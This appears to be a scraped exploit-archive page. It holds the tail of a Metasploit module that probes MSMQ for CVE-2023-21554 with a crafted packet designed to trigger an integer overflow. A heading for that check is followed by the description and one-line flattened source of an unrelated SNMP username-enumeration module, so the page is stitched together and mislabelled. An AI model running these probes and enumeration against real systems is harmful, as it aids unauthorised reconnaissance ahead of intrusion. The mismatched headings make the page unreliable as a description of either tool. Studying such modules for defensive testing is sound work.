      Content-Type: multipart/related; boundary="MSMQ - SOAP boundary, 53287"; type=text/xml\r  
      Host: 192.168.10.100\r  
      SOAPAction: "MSMQMessage"\r  
      Proxy-Accept: NonInteractiveClient\r  
      \r  
      --MSMQ - SOAP boundary, 53287\r  
      Content-Type: text/xml; charset=UTF-8\r  
      Content-Length: 606\r  
      \r  
      <se:Envelope xmlns:se="http://schemas.xmlsoap.org/soap/envelope/" \r  
      xmlns="http://schemas.xmlsoap.org/srmp/">\r  
      <se:Header>\r  
       <path xmlns="http://schemas.xmlsoap.org/rp/" se:mustUnderstand="1">\r  
         <action>MSMQ:poc</action>\r  
         <to>http://192.168.10.100/msmq/private$/queuejumper</to>\r  
         <id>uuid:1@00000000-0000-0000-0000-000000000000</id>\r  
       </path>\r  
       <properties se:mustUnderstand="1">\r  
         <expiresAt>20600609T164419</expiresAt>\r  
         <sentAt>20230724T164419</sentAt>\r  
       </properties>\r  
      </se:Header>\r  
      <se:Body></se:Body>\r  
      </se:Envelope>\r  
      \r  
      --MSMQ - SOAP boundary, 53287\r  
      Content-Type: application/octet-stream\r  
      Content-Length: 7\r  
      Content-Id: body@ff3af301-3196-497a-a918-72147c871a13\r  
      \r  
      Message\r  
      --MSMQ - SOAP boundary, 53287--\x00  
    EOF  
    compound_message_header.http_body_size = compound_message_header.data.length

    extension_header = ExtensionHeader.new

    # Extension header will be empty in this case. The length is set to the minimal value of 12.  
    extension_header.header_size = 12

    extension_header.remaining_headers_size = 0  
    extension_header.flags = 0  
    extension_header.reserved = "\x00" * 3

    # Total packet size within the BaseHeader is calculated, now that all message parts were instantiated  
    base_header.packet_size = base_header.to_binary_s.length + user_header.to_binary_s.length + message_properties_header.to_binary_s.length + srmp_envelope_header.to_binary_s.length + compound_message_header.to_binary_s.length + extension_header.to_binary_s.length

    # A normal message is sent to the server. This should yield a result for both, vulnerable and patched MSMQ instances  
    response = send_message(base_header.to_binary_s + user_header.to_binary_s + message_properties_header.to_binary_s + srmp_envelope_header.to_binary_s + compound_message_header.to_binary_s + extension_header.to_binary_s)

    if !response  
      print_error('No response received due to a timeout')  
      return  
    end

    if response.include?('LIOR')  
      # Response from server contains the static signature value 'LIOR'. Presence of MSMQ is confirmed  
      print_status('MSMQ detected. Checking for CVE-2023-21554')  
    else  
      print_error('Service does not look like MSMQ')  
      return  
    end

    # This statement increases the DataLength field within the SRMPEnvelopeHeader by 0x80000000. This will cause  
    # an integer overflow, that overflows the 4 integer bytes. By adding this value the least significant 4 bytes will  
    # remain the same, to ensure that a vulnerable MSMQ instance doesn't try to access invalid memory. This means that  
    # vulnerable instances are expected to sent a normal response, like for the first, unmodified packet.  
    #  
    # Patched instances will detect the overflow, throw an exception and stop processing the message. No response is expected.  
    srmp_envelope_header.data_length = srmp_envelope_header.data_length + 2147483648

    response = send_message(base_header.to_binary_s + user_header.to_binary_s + message_properties_header.to_binary_s + srmp_envelope_header.to_binary_s + compound_message_header.to_binary_s + extension_header.to_binary_s)

    if response.nil?  
      print_error('No response received, MSMQ seems to be patched')  
      return  
    end

    if response.include?('LIOR')  
      print_good('MSMQ vulnerable to CVE-2023-21554 - QueueJumper!')

      # Add Report  
      report_vuln(  
        host: ip,  
        port: rport,  
        proto: 'tcp',  
        name: name,  
        info: 'Missing Microsoft Windows patch for CVE-2023-21554',  
        refs: references  
      )

    else  
      print_error('Unknown response detected upon sending a malformed message. MSMQ might be vulnerable, but the behaviour is unusual')  
    end  
  rescue ::Rex::ConnectionError  
    print_error('Unable to connect to the service')  
  rescue ::Errno::ECONNRESET  
    print_error('Connection reset by service')  
  rescue ::Errno::EPIPE  
    print_error('pipe error')  
  rescue Timeout::Error  
    print_error('Timeout after waiting for service to respond')  
  rescue StandardError => e  
    print_error(e)  
  end  
end

CVE-2023-21554 QueueJumper - MSMQ Remote Code Execution Check

This Metasploit module will use LanManager/psProcessUsername OID values to enumerate local user accounts on a Windows/Solaris system via SNMP .

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SNMPClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  include SNMP  def initialize    super(      'Name'        => 'SNMP Windows Username Enumeration',      'Description' => '        This module will use LanManager/psProcessUsername OID values to        enumerate local user accounts on a Windows/Solaris system via SNMP      ',      'Author'      => ['tebo[at]attackresearch.com'],      'License'     => MSF_LICENSE    )  end  def run_host(ip)    peer = "#{ip}:#{rport}"    begin      snmp = connect_snmp      sys_desc = snmp.get_value('sysDescr.0')      if sys_desc.blank? || sys_desc.to_s == 'Null'        vprint_error("#{peer} No sysDescr received")        return      end      sys_desc = sys_desc.split(/[\r\n]/).join(' ')      sys_desc_map = {        /Windows/ => '1.3.6.1.4.1.77.1.2.25',        /Sun/ => '1.3.6.1.4.1.42.3.12.1.8'      }      matching_oids = sys_desc_map.select { |re, _| sys_desc =~ re }.values      if matching_oids.empty?        vprint_warning("#{peer} Skipping unsupported sysDescr: '#{sys_desc}'")        return      end      users = []      matching_oids.each do |oid|        snmp.walk(oid) do |row|          row.each { |val| users << val.value.to_s }        end      end      unless users.empty?        users.sort!        users.uniq!        print_good("#{peer} Found #{users.size} users: #{users.join(', ')}")      end      report_note(        host: rhost,        port: rport,        proto: 'udp',        sname: 'snmp',        update: :unique_data,        type: 'snmp.users',        data: users      )    rescue SNMP::ParseError      print_error("#{ip} Encountered an SNMP parsing error while trying to enumerate the host.")    rescue ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion      # too noisy for a scanner    ensure      disconnect_snmp    end  endend

Tag

#windows